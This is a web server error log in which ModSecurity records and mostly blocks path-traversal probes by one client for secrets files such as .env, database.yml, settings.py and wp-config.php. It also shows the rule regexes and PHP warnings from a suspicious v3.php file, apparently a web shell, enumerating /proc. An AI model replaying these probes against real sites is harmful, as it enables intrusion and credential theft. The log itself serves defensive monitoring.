[Tue May 12 04:51:36.932509 2026] [security2:error] [pid 1730207:tid 1730217] [client 93.123.109.165:12082] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVuDue9Sp-pIv_Bb64KwAAAUg"]
[Tue May 12 04:51:36.932655 2026] [security2:error] [pid 1730207:tid 1730217] [client 93.123.109.165:12082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVuDue9Sp-pIv_Bb64KwAAAUg"]
[Tue May 12 04:51:37.320022 2026] [security2:error] [pid 1730207:tid 1730217] [client 93.123.109.165:12082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVuDue9Sp-pIv_Bb64KwAAAUg"]
[Tue May 12 04:51:37.429647 2026] [security2:error] [pid 1825179:tid 1825220] [client 93.123.109.165:12096] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /files../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVudr1yOh9TvizeziS9gAAAFY"]
[Tue May 12 04:51:37.429794 2026] [security2:error] [pid 1825179:tid 1825220] [client 93.123.109.165:12096] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVudr1yOh9TvizeziS9gAAAFY"]
[Tue May 12 04:51:37.817489 2026] [security2:error] [pid 1825179:tid 1825220] [client 93.123.109.165:12096] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVudr1yOh9TvizeziS9gAAAFY"]
[Tue May 12 04:51:37.899326 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:12098] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVuRfeipD4uoG21FolmAAAABE"]
[Tue May 12 04:51:37.899401 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:12098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVuRfeipD4uoG21FolmAAAABE"]
[Tue May 12 04:51:37.899513 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:12098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVuRfeipD4uoG21FolmAAAABE"]
[Tue May 12 04:51:38.295823 2026] [security2:error] [pid 1808852:tid 1808872] [client 93.123.109.165:12098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVuRfeipD4uoG21FolmAAAABE"]
[Tue May 12 04:51:38.377757 2026] [core:error] [pid 1825287:tid 1825304] [client 93.123.109.165:12100] AH10244: invalid URI path (/public../../../.env)
[Tue May 12 04:51:38.870557 2026] [core:error] [pid 1808852:tid 1808864] [client 93.123.109.165:12112] AH10244: invalid URI path (/public../../../../.env)
[Tue May 12 04:51:39.404216 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:12128] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVuwgpmE1yW0glLdgh7AAAAMU"]
[Tue May 12 04:51:39.404286 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:12128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVuwgpmE1yW0glLdgh7AAAAMU"]
[Tue May 12 04:51:39.404431 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:12128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVuwgpmE1yW0glLdgh7AAAAMU"]
[Tue May 12 04:51:39.781772 2026] [security2:error] [pid 1825287:tid 1825310] [client 93.123.109.165:12128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVuwgpmE1yW0glLdgh7AAAAMU"]
[Tue May 12 04:51:39.874881 2026] [security2:error] [pid 1808852:tid 1808876] [client 93.123.109.165:12142] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVuxfeipD4uoG21FolnAAAABU"]
[Tue May 12 04:51:39.874973 2026] [security2:error] [pid 1808852:tid 1808876] [client 93.123.109.165:12142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVuxfeipD4uoG21FolnAAAABU"]
[Tue May 12 04:51:39.875082 2026] [security2:error] [pid 1808852:tid 1808876] [client 93.123.109.165:12142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVuxfeipD4uoG21FolnAAAABU"]
[Tue May 12 04:51:40.266354 2026] [security2:error] [pid 1808852:tid 1808876] [client 93.123.109.165:12142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVuxfeipD4uoG21FolnAAAABU"]
[Tue May 12 04:51:40.360179 2026] [access_compat:error] [pid 1730175:tid 1730187] [client 93.123.109.165:12156] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:40.845056 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:12158] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVvAgpmE1yW0glLdgh7gAAANg"]
[Tue May 12 04:51:40.845192 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:12158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVvAgpmE1yW0glLdgh7gAAANg"]
[Tue May 12 04:51:41.233978 2026] [security2:error] [pid 1825287:tid 1825330] [client 93.123.109.165:12158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVvAgpmE1yW0glLdgh7gAAANg"]
[Tue May 12 04:51:41.334167 2026] [security2:error] [pid 1820198:tid 1820210] [client 93.123.109.165:12168] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVvc1tk6y7yBJLpJotOgAAAIo"]
[Tue May 12 04:51:41.334307 2026] [security2:error] [pid 1820198:tid 1820210] [client 93.123.109.165:12168] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVvc1tk6y7yBJLpJotOgAAAIo"]
[Tue May 12 04:51:41.728599 2026] [security2:error] [pid 1820198:tid 1820210] [client 93.123.109.165:12168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVvc1tk6y7yBJLpJotOgAAAIo"]
[Tue May 12 04:51:41.873850 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:12170] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /public../../config/database.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVvTue9Sp-pIv_Bb64LwAAAUM"]
[Tue May 12 04:51:41.874010 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:12170] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/config/database.yml"] [unique_id "agKVvTue9Sp-pIv_Bb64LwAAAUM"]
[Tue May 12 04:51:42.256183 2026] [security2:error] [pid 1730207:tid 1730212] [client 93.123.109.165:12170] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVvTue9Sp-pIv_Bb64LwAAAUM"]
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007201/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007201/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007201/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007201/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/2007201/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/2007201/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:52:19.864029 2026] [security2:error] [pid 1825287:tid 1825311] [client 129.226.94.52:48728] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/nature/"] [unique_id "agKV4wgpmE1yW0glLdgiDgAAAMY"]
[Tue May 12 04:52:29.944993 2026] [:error] [pid 1820198:tid 1820206] [client 74.7.243.217:53082] File does not exist: /home/ofcrysta/public_html/exposition_chien.php, referer: http://of-crystal-lake.net/chiens.php?s=u
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1826222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1826222/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1826222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1826222/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1826222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1826222/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/520/task/520/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/520/task/520/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/520/task/520/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/520/task/520/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/520/task/520/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/520/task/520/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 04:53:19.528874 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:19.651632 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:19.776073 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:19.897098 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.020115 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.142142 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.263831 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.384667 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.507062 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:20.627603 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:21.014269 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:21.387635 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:21.511870 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:21.633738 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
[Tue May 12 04:53:21.757417 2026] [proxy_fcgi:error] [pid 1820198:tid 1820221] [client 20.9.31.235:20704] AH01071: Got error 'Primary script unknown'
